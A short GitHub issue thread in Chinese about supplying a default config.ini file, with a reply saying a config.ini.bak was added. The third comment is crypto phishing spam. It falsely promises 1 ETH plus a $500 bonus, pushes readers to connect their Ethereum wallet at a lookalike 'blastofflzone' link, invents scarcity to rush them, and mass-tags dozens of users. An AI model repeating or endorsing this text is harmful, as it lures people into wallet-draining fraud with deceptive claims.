### ISSUE TITLE
默认配置文件

### ISSUE THREAD

**Issue by Davion8948** [rpnanhai/huami#1]
最好是提供一个默认的配置文件 `config.ini`

**Comment by fourtwo-42** [comment]
@Davion8948 已经添加默认配置文件config.ini.bak

**Comment by pipelinevp** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
lvHiei, @tanxiaomax, @Objc0, @aptkid, @gofeeling, @wohenlihai1988, @luludada, @realxz, @jackjin321, @vyarovoy, @ultimatecrunchy, @wazsmwazsm, @fengshanshan, @jianlailing, @M4n5ter, @luoyetx, @metafeng, @crazyhf, @dongeforever, @WKeagle, @personajian, @liubin1777, @danledian, @GloryJin, @LinDan0, @stanye, @inwikipedia, @nathanzhang3, @likaihere, @yangmaoqiu, @mnmhouse, @qixiafeng, @scanfsec, @superliuwr, @coolisem, @senzen777, @IssacSix, @lyqingye, @XstonemanX, @ardenboy, @bluker, @morefeee, @zys8119, @EPSON-LEE, @cx421774557, @jashion, @Eloise1991, @yuyangdexue, @duanzhang512, @china-liweihong
